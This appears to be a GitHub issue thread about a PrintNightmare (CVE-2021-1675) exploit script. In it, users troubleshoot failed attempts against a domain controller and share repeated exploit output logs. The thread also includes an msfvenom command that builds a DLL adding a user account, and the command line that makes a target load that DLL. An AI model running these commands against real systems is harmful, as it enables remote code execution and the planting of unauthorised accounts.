Closed hdbreaker closed 3 years ago
With a local file in DC it not fail but not reverse shell was executed:
[*] Try 1...
[*] Connecting to ncacn_np:192.168.10.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3138b2c823dd1ea9\Amd64\UNIDRV.DLL
[*] Executing C:\addCube.dll
[*] Stage0: 0
[*] Try 2...
[*] Connecting to ncacn_np:192.168.10.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3138b2c823dd1ea9\Amd64\UNIDRV.DLL
[*] Executing C:\addCube.dll
[*] Stage0: 0
[*] Try 3...
[*] Connecting to ncacn_np:192.168.10.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3138b2c823dd1ea9\Amd64\UNIDRV.DLL
[*] Executing C:\addCube.dll
[*] Stage0: 0
When hosting using samba on linux, did you run # useradd smbuser
? If not, you'll probably get that error if using the provided smb.conf.
Okey, I'm able to exploit it but the DLL is not been executed, I'm created it with:
./msfvenom -p windows/x64/exec CMD="net user XXXX XXXXX /add" -o ~/Desktop/addCube.dll
I manually copied it to the vulnerable server in C:\ and I executed it with:
python3 CVE-2021-1675.py xxxxx:xxxxxxxx@192.168.10.10 'C:\addCube.dll'
Exactly the same is happening with remote dll!
No AV in target, do you know what it could be happening?
I found my way to made it work! thanks for your support!
can you share plz since i got the same error?
@hdbreaker can you share how you got it worked?
The exploit fails, after a successful connection, bind, and dll upload with error ERROR_NO_SUCH_USER: